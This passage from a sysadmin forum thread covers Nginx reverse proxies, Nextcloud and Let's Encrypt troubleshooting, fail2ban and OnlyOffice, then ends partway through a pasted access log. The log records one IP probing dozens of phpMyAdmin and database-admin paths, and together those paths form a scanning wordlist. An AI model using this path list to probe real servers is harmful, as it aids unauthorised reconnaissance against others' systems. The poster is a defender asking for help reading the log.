Fedora 31 Server Edition filesystem permissions changed to 777
-
@JaredBusch I never understood why to use Nginx as reverse proxy What's the meaning with it?
-
@Woti said in Fedora 31 Server Edition filesystem permissions changed to 777:
@JaredBusch I never understood why to use Nginx as reverse proxy What's the meaning with it?
A reverse proxy allows you to have multiple websites on the same port behind 1 IP address. This also generally means multiple servers behind the proxy as well - as if all websites were on a single http service, that service could likely determine itself which webservice to give the packets to.
-
@Dashrender said in Fedora 31 Server Edition filesystem permissions changed to 777:
@Woti said in Fedora 31 Server Edition filesystem permissions changed to 777:
@JaredBusch I never understood why to use Nginx as reverse proxy What's the meaning with it?
A reverse proxy allows you to have multiple websites on the same port behind 1 IP address. This also generally means multiple servers behind the proxy as well - as if all websites were on a single http service, that service could likely determine itself which webservice to give the packets to.
This is correct. Specifically, I have a server in a colo. I have a single IP available to me.
So ports 80/443 on that IP are directed to the Nginx Reverse Proxy. Nginx handles sending the inbound FQDN to the right backend servers.
https://domain.com = 12.45.67.89 https://nc.domain.com = 12.45.67.89 https://blog.domain.com = 12.45.67.89
How do you make all of that work? With a Reverse Proxy. Nginx is much better at that than Apache.
Nginx is listening on 12.45.67.89:80 and 12.45.67.89:443
When something comes in, it reads the FQDN out of the HTTP headers and sends it on to the correct backend IP.domain.com = 10.1.2.3 nc.domain.com = 10.1.2.4 blog.domain.com = 10.1.2.5
-
THANK YOU @JaredBusch and @Dashrender for this good explanation. That was the easiest understandable explanation I have heard for a long time.
I'll try my luck again. Thanks again guys.
-
Don't know if it was said, but a reverse proxy is also a front end that handles your SSL in many cases.
-
Finally, I got it! Nextcloud is up and running. It was litt of a mess.
1st of all the error
[ssl:warn] AH01909: woti.dedyn.io:443:0 server certificate does NOT include an ID which matches the server name
was hard to figure out, but finally I found it in a .json file from Letsencrypt and as well in the localhost.crt.
When I installed Fedora I choosed woti as hostname. But just woti does not work as hostname while creating Letsencrypt certs. It has to be woti.domain.xxx. So I used my domain but I did not changed my hostname while creating my Letsencrypt certs. That's why I got an ID which not matched the servername.
I needed to create new certs.2nd suddenly comes up a SELinux error about no access to /nextcloud/data. I needed to "Allow httpd to unified"
3th the tutorial I followed https://linuxize.com/post/secure-apache-with-let-s-encrypt-on-centos-8/ gaves me just redirection errors. I do not why. I had to use my old config files from c-rieger.com. I'll try again later.
Maybe I can post my conf files her and you guys can take a look?4th I used APCu as memcache before. Now I had installed Redis but I did not changed it in the Nextcloud config file. That was the reason for internal server error. Redis gives me some warnings in the redis.log. I need to check this.
-
@Woti said in Fedora 31 Server Edition filesystem permissions changed to 777:
Finally, I got it! Nextcloud is up and running. It was litt of a mess.
NC 18 just released.
-
Yeah I know. Next step
Btw. @scottalanmiller I saw you are using fail2ban in your script.
But is there no configuration necassery?
You're just using "systemctl enable fail2ban" and "systemctl start fail2ban" or is it obsolete to use fail2ban? -
@Woti said in Fedora 31 Server Edition filesystem permissions changed to 777:
But is there no configuration necassery?
You're just using "systemctl enable fail2ban" and "systemctl start fail2ban" or is it obsolete to use fail2ban?For basic SSH protection, yes, that simple.
-
@scottalanmiller Oh yeah I thought it was meant for Nextcloud...
-
Someone have tried the new Nextcloud 18 with OnlyOffice?
I get error messages:
Community document server is not supported for this instance, please setup and configure an external document server
Getting those messages
-
@Woti the error is explained, you need an external server with the community version.
-
@DustinB3403 said in Fedora 31 Server Edition filesystem permissions changed to 777:
@Woti the error is explained, you need an external server with the community version.
Kind of undermines their entire post stating the opposite. Maybe Nextcloud Hub isn't made yet and they are talking about something happening "someday", not something relevant today?
-
@DustinB3403 as much as I understand it, should it be enough with activating OnlyOffice and community document server.
For someone it is working, for someone else it's not working
Description
*The community document server is designed to make it easy to get OnlyOffice running in a Nextcloud instance without the need to setup an external document server, the community document server does not support all features of the official OnlyOffice document server and does not provide the same performance and scalability.If you are setting up a larger instance of require the additional performance, please see https://onlyoffice.com for options for getting the official document server.
The community document server will automatically be configured if no other document server is configured for OnlyOffice.*
-
Both OnlyOffice and Community Document comes out with new updates and now it works out-of-the-box
-
@Woti said in Fedora 31 Server Edition filesystem permissions changed to 777:
Both OnlyOffice and Community Document comes out with new updates and now it works out-of-the-box
That'st he theory, but it doesn't seem to happen.
-
@Woti said in Fedora 31 Server Edition filesystem permissions changed to 777:
Both OnlyOffice and Community Document comes out with new updates and now it works out-of-the-box
No apps able to load here, maybe their servers are overloaded?
-
I got them yesterday. Community Documents v0.1.3 and OnlyOffice v4.1.2
-
Hello,
please guys, how would you translate these entries in my access.log file? The whole logfile is full of these entries.123.192.97.66 - - [08/Feb/2020:22:50:38 +0100] "GET /phpmy/index.php?lang=en HTTP/1.1" 302 229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:39 +0100] "GET /phppma/index.php?lang=en HTTP/1.1" 302 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:39 +0100] "GET /myadmin/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:40 +0100] "GET /shopdb/index.php?lang=en HTTP/1.1" 302 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:41 +0100] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:41 +0100] "GET /program/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:42 +0100] "GET /PMA/index.php?lang=en HTTP/1.1" 302 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:43 +0100] "GET /dbadmin/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:43 +0100] "GET /pma/index.php?lang=en HTTP/1.1" 302 227 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:44 +0100] "GET /db/index.php?lang=en HTTP/1.1" 302 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:45 +0100] "GET /admin/index.php?lang=en HTTP/1.1" 302 229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:45 +0100] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 302 237 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:46 +0100] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 302 237 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:47 +0100] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:47 +0100] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:48 +0100] "GET /php-myadmin/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:49 +0100] "GET /phpmy-admin/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:49 +0100] "GET /mysqladmin/index.php?lang=en HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:50 +0100] "GET /mysql-admin/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:51 +0100] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:52 +0100] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:52 +0100] "GET /admin/sysadmin/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:53 +0100] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:54 +0100] "GET /admin/db/index.php?lang=en HTTP/1.1" 302 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:54 +0100] "GET /admin/web/index.php?lang=en HTTP/1.1" 302 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:55 +0100] "GET /admin/pMA/index.php?lang=en HTTP/1.1" 302 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:56 +0100] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 302 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:56 +0100] "GET /mysql/db/index.php?lang=en HTTP/1.1" 302 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:57 +0100] "GET /mysql/web/index.php?lang=en HTTP/1.1" 302 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:58 +0100] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 302 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:58 +0100] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:50:59 +0100] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 302 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:00 +0100] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 302 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:00 +0100] "GET /sql/sql/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:01 +0100] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:02 +0100] "GET /sql/webadmin/index.php?lang=en HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:02 +0100] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:03 +0100] "GET /sql/websql/index.php?lang=en HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:04 +0100] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 302 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:04 +0100] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:05 +0100] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 302 237 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:06 +0100] "GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1" 302 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:06 +0100] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 302 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:07 +0100] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:08 +0100] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:08 +0100] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:09 +0100] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 302 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:10 +0100] "GET /db/websql/index.php?lang=en HTTP/1.1" 302 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:10 +0100] "GET /db/webdb/index.php?lang=en HTTP/1.1" 302 232 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:11 +0100] "GET /db/dbadmin/index.php?lang=en HTTP/1.1" 302 234 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:12 +0100] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:12 +0100] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:13 +0100] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:14 +0100] "GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1" 302 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:14 +0100] "GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1" 302 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:15 +0100] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 302 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:16 +0100] "GET /administrator/db/index.php?lang=en HTTP/1.1" 302 240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:16 +0100] "GET /administrator/web/index.php?lang=en HTTP/1.1" 302 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:17 +0100] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 302 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:18 +0100] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 302 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:18 +0100] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 302 243 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:19 +0100] "-" 408 - "-" "-" 123.192.97.66 - - [08/Feb/2020:22:51:19 +0100] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:20 +0100] "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:20 +0100] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 302 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:21 +0100] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:22 +0100] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 302 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:22 +0100] "GET /PMA2011/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:23 +0100] "GET /PMA2012/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:24 +0100] "GET /PMA2013/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:24 +0100] "GET /PMA2014/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:25 +0100] "GET /PMA2015/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:26 +0100] "GET /PMA2016/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:27 +0100] "GET /PMA2017/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:27 +0100] "GET /PMA2018/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:28 +0100] "GET /PMA2019/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:29 +0100] "GET /PMA2020/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:29 +0100] "GET /pma2011/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:30 +0100] "GET /pma2012/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:31 +0100] "GET /pma2013/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:31 +0100] "GET /pma2014/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:32 +0100] "GET /pma2015/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:33 +0100] "GET /pma2016/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:34 +0100] "GET /pma2017/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:34 +0100] "GET /pma2018/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:35 +0100] "GET /pma2019/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:36 +0100] "GET /pma2020/index.php?lang=en HTTP/1.1" 302 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:36 +0100] "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:37 +0100] "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - [08/Feb/2020:22:51:38 +0100] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 302 238 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" 123.192.97.66 - - 